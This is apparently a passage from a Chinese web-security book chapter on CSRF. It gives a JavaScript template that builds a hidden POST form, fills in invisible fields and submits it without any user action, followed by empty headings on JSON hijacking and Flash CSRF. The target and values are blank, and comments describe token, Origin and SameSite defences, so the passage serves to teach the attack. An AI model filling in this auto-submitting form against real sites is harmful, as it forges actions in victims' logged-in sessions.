web前端黑客技术揭秘 4.前端黑客之CSRF

 

 

 /**
  * Create an empty <form>, attach it to the current page and set it to POST.
  *
  * The form is built entirely from script, so nothing here depends on markup
  * already present in the page.
  *
  * @returns {HTMLFormElement} the form that was appended to document.body
  */
 function new_form() {
   // appendChild returns the node it was given, so the new form can be
   // captured in the same expression that attaches it.
   const form = document.body.appendChild(document.createElement("form"));
   form.method = "post";
   return form;
 }
 /**
  * Add one invisible text field to a form.
  *
  * @param {HTMLFormElement} eForm  form object that receives the field
  * @param {string} eName           name of the form field
  * @param {string} eValue          value of the form field
  * @returns {HTMLInputElement} the input element that was appended to eForm
  */
 function create_elements(eForm, eName, eValue) {
   const field = eForm.appendChild(document.createElement("input"));
   field.type = "text";
   field.name = eName;

   // Cross-browser hiding so the field is not visible to the user: where
   // document.all is truthy (presumably legacy IE) the field stays
   // display:block but is collapsed to 0x0, otherwise it is display:none.
   const hiddenStyle = document.all
     ? { display: "block", width: "0px", height: "0px" }
     : { display: "none" };
   Object.assign(field.style, hiddenStyle);

   field.value = eValue;
   return field;
 }
// Driver for the listing: build the form, point it at a target, add one
// field, then submit. The action URL, field name and field value are left
// blank in the listing.
var _f = new_form();
_f.action = "";
create_elements(_f, "", "");

// Submitted automatically, with no click from the user. The browser sends the
// POST like any other form post, which is why a state-changing endpoint has to
// verify something a foreign page cannot supply (a per-session anti-CSRF
// token, or an Origin/Referer check) and why SameSite cookies are used as
// defence in depth.
_f.submit();

 

4.2  CSRF类型

 

4.2.2  JSON HiJacking攻击

 

4.2.3  Flash CSRF攻击
